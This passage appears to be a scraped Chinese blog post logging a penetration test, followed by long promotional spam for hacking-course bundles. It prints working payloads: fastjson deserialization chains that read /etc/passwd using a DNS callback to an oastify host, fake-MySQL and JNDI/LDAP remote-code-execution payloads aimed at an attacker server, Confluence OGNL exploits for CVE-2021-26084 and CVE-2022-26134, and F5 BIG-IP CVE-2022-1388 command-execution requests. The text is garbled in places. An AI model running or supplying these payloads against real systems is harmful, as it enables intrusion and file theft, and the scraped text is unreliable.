- 1SpringBoot整合Kafka
- 2map,split用法,nodejs实现水仙花数_node split map
- 3安装minikube中启动kubectl失败踩坑_failed to run kubelet" err="failed to run kubelet:
- 4【随笔】Git -- 高级命令(下篇)(八)
- 5单片机蜂鸣器音乐代码_51单片机蜂鸣器
- 6axios的介绍与使用_$axios
- 7EXCEL中所有函数的使用_excel 定义相对位置的数组
- 8Ts学习之路-基础篇(可选参数 or 参数默认值)_ts 定义对象设置默认值
- 9软件测试培训分享:软件测试自学能找到工作吗_医疗专业自学软件测试可以找到工作吗
- 10springBoot使用rabbitmq并保证消息可靠性_springboot rabbitmq保证消息不丢失
三流安全工程师的渗透测试记录,网络安全系列学习进阶视频
赞
踩
"delegate": {
"@type": "org.apache.commons.io.input.ReaderInputStream",
"reader": {
"@type": "jdk.nashorn.api.scripting.URLReader",
"url": "file:///etc/passwd"
},
"charsetName": "UTF-8",
"bufferSize": 1024
},"boms": \[
{
"@type": "org.apache.commons.io.ByteOrderMark",
"charsetName": "UTF-8",
"bytes": \[114,
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
]
}
]
},
“address”: {
“@type”: “java.lang.AutoCloseable”,
“@type”: “org.apache.commons.io.input.BOMInputStream”,
“delegate”: {
“@type”: “org.apache.commons.io.input.ReaderInputStream”,
“reader”: {
“@type”: “jdk.nashorn.api.scripting.URLReader”,
“url”: “http://xxxx.oastify.com/”
},
“charsetName”: “UTF-8”,
“bufferSize”: 1024
},
“boms”: [{“
r
e
f
"
:
"
ref":"
ref":".abc.BOM[0]”}]
},
“xxx”:{“
r
e
f
"
:
"
ref":"
ref":".address.BOM[0]”}
}
114对应/etc/passwd第一行第一个字节r的ascii码,当字节序列匹配时,dnslog上会收到请求:  当字节序列不匹配时,dnslog上接收不到请求:  尝试读取/etc/passwd的第一行,匹配的字节序列为: “bytes”:[114,111,111,116,58,120,58,48,58,48,58,114,111,111,116,58,47,114,111,111,116,58,47,98,105,110,47,97,115,104,]:  即读取到/etc/passwd第一行为:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
root❌0:0:root:/root:/bin/ash
###### 2.管理后台存在fastjson反序列任意文件读取(类似布尔盲注)
payload如下:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
{“abc”:{“@type”:“java.lang.AutoCloseable”,“@type”:“org.apache.commons.io.input.BOMInputStream”,“delegate”:{“@type”:“org.apache.commons.io.input.ReaderInputStream”,“reader”:{“@type”:“jdk.nashorn.api.scripting.URLReader”,“url”:“file:///etc/passwd”},“charsetName”:“UTF-8”,“bufferSize”:1024},“boms”:[{“@type”:“org.apache.commons.io.ByteOrderMark”,“charsetName”:“UTF-8”,“bytes”:[114]}]},“address”:{“@type”:“java.lang.AutoCloseable”,“@type”:“org.apache.commons.io.input.CharSequenceReader”,“charSequence”:{“@type”:“java.lang.String”{“ r e f " : " ref":" ref":".abc.BOM[0]”},“start”:0,“end”:0}}
114对应/etc/passwd第一行第一个字节r的ascii码,当字节序列匹配时,服务器返回状态为500:  不匹配则返回200:  尝试读取/etc/passwd文件的第一行,匹配的字节序列为: “bytes”:[114,111,111,116,58,120,58,48,58,48,58,114,111,111,116,58,47,114,111,111,116,58,47,98,105,110,47,97,115,104,]:  即读取到/etc/passwd第一行为:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
root❌0:0:root:/root:/bin/ash
有关fastjson反序列化读取文件可参考: [https://mp.weixin.qq.com/s/esjHYVm5aCJfkT6I1D0uTQ]( ) https://tyskill.github.io/posts/fastjson%E6%97%A0%E5%9B%9E%E6%98%BE%E8%AF%BB%E6%96%87%E4%BB%B6/ ###### 3.微信小程序fastjson反序列化远程代码执行漏洞(fake mysql利用) 微信小程序请求的domain2.target.com域名下的三个接口存在反序列化RCE漏洞: 服务端启动一个fake mysql:  Burp中发送如下payload,让目标机器向目标域名xxxx.oastify.com发起一次DNS请求:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
{“x”:{“@type”:“java.lang.AutoCloseable”,“@type”:“com.mysql.jdbc.JDBC4Connection”,“hostToConnectTo”:“vps_ip”,“portToConnectTo”:3306,“info”:{“user”:“yso_URLDNS_http://xxx.oastify.com”,“password”:“ubuntu”,“useSSL”:“false”,“statementInterceptors”:“com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor”,“autoDeserialize”:“true”},“databaseToConnectTo”:“mysql”,“url”:“”}}
发送后,fake mysql服务器上接收到目标请求,并将payload返回给目标机器,让目标机器执行:  过几秒后,r7zfjbp3hnp749lu4slz9rygr7xxlm.oastify.com接收到dns查询请求:  fake mysql利用难的是找到一条利用链getshell,此处试了ysoserial中的所有链子,并没有找到一条利用链子。关于fastjson RCE的fake mysql利用方式可参考: https://github.com/dushixiang/evil-mysql-server https://github.com/fnmsd/MySQL\_Fake\_Server ###### 4.某后台存在fastjson反序列化远程代码执行漏洞(JNDI注入高版本绕过) 项目地址:https://github.com/veracode-research/rogue-jndi Vps上启动一个ldap服务:  Burp中发送如下payload:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
{“name”:{“\u0040\u0074\u0079\u0070\u0065”:“\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073”,“\u0076\u0061\u006c”:“\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c”},“x”:{“\u0040\u0074\u0079\u0070\u0065”:“\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c”,“\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065”:“ldap://x.x.x.x:2389/o=tomcat”,“autoCommit”:true}}
Dnslog上收到请求,且whoami被执行,权限为root:  关于JNDI注入高版本绕过可参考: https://blog.csdn.net/mole\_exp/article/details/121141042 https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html ###### 5.内网Confluence存在CVE-2021-26084和CVE-2022-26134远程代码执行漏洞 ###### (1)CVE-2021-26084 CVE-2021-26084即是Atlassian Confluence OGNL表达式注入代码执行漏洞,版本小于7.13.0,有多个接口存在这个OGNL表达式注入漏洞,重点关注以下三个路径: 在无需登录的情况下,访问/pages/doenterpagevariables.action或/pages/createpage-entervariables.action,如果存在,说明存在该漏洞。 在登录状态下(需要是管理员或有权限访问/admin/console.action),访问/pages/createpage.action,也可进行漏洞利用。 payload:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027
Burp中发送如下数据包:  可以看到命令被执行,权限为root:  ###### (2) CVE-2022-26134 Confluence OGNL 注入漏洞,查看返回数据包X-Cmd-Response字段内容 payload:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
Burp中发送payload,获取服务器root权限:  Confluence漏洞合集: https://www.dianjilingqu.com/504336.html ##### 五、某企业内网F5-BIG-IP 远程代码执行漏洞(CVE-2022-1388) 该漏洞允许未授权的攻击者通过接口对BIG-IP系统访问,并能执行任意系统命令、创建、删除文件以及关闭服务 payload1:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
POST /mgmt/tm/util/bash HTTP/1.1
Host: ip:port
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0
{“command”: “run” , “utilCmdArgs”: " -c ‘id’ " }
payload2:
- 1
- 2
- 3
- 4
- 5
POST /mgmt/tm/util/bash HTTP/1.1
Host:ip:port
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0
{“command”: “run” , “utilCmdArgs”: " -c ’ cat /etc/passwd’ " }
 参考: https://forum.butian.net/share/1567 至于内网中常见的弱口令,docker-api未授权,Nacos默认口令/未授权认证绕过,Spring actuator未授权访问等这些漏洞就不用说了。 ##### 0x02 总结 1.作为三流安全工程师,脚本小子,渗透嘛,就是拿着别人写的脚本、工具去扫描、去攻击,梭哈是艺术,找到洞是运气,找不到洞是常事。getshell了感觉自己又行了。 2.找不到洞又得写报告,什么中间件版本信息泄漏、用户名枚举、明文传输、jquery版本存在xss、x-frame-options报头缺失点击劫持啥的写上。 3.做水水的事,写水水的报告是工作常态。 **黑客&网络安全如何学习** **今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。** #### **1.学习路线图**  攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。 #### **2.视频教程** 网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。 内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。  (都打包成一块的了,不能一一展开,总共300多集) 因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取 ****************************************************************************************************************************************************************************************************************************************************************[CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]( )**************************************************************************************************************************************************************************************************************************************************************** #### **3.技术文档和电子书** 技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。  因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取 ****************************************************************************************************************************************************************************************************************************************************************[CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]( )**************************************************************************************************************************************************************************************************************************************************************** #### **4.工具包、面试题和源码** “工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。 还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。 因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取 ****************************************************************************************************************************************************************************************************************************************************************[CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]( )**************************************************************************************************************************************************************************************************************************************************************** 最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。 这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。 **自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。** **深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!** **因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**       **既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!** **由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新** **如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**  还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包! 王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。 对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料! 【完整版领取方式在文末!!】 ***93道网络安全面试题***    内容实在太多,不一一截图了 ### 黑客学习资源推荐 最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助! 对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。 #### 1️⃣零基础入门 ##### ① 学习路线 对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。  ##### ② 路线对应学习视频 同时每个成长路线对应的板块都有配套的视频提供:  **一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**  网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。  ##### ② 路线对应学习视频 同时每个成长路线对应的板块都有配套的视频提供:  **一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!** [外链图片转存中...(img-2C0OLC7e-1713045008602)]
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
- 121
- 122
- 123
- 124
- 125
- 126
- 127
- 128
- 129
- 130
- 131
- 132
- 133
- 134
- 135
- 136
- 137
- 138
- 139
- 140
- 141
- 142
- 143
- 144
- 145
- 146
- 147
- 148
- 149
- 150
- 151
- 152
- 153
- 154
- 155
- 156
- 157
- 158
- 159
- 160
- 161
- 162
- 163
- 164
- 165
- 166
- 167
- 168
- 169
- 170
- 171
- 172
- 173
- 174
- 175
- 176
- 177
- 178
- 179
- 180
- 181
- 182
- 183
- 184
- 185
- 186
- 187
- 188
- 189
- 190
- 191
- 192
- 193
- 194
- 195
- 196
- 197
- 198
- 199
- 200
- 201
- 202
- 203
- 204
- 205
- 206
- 207
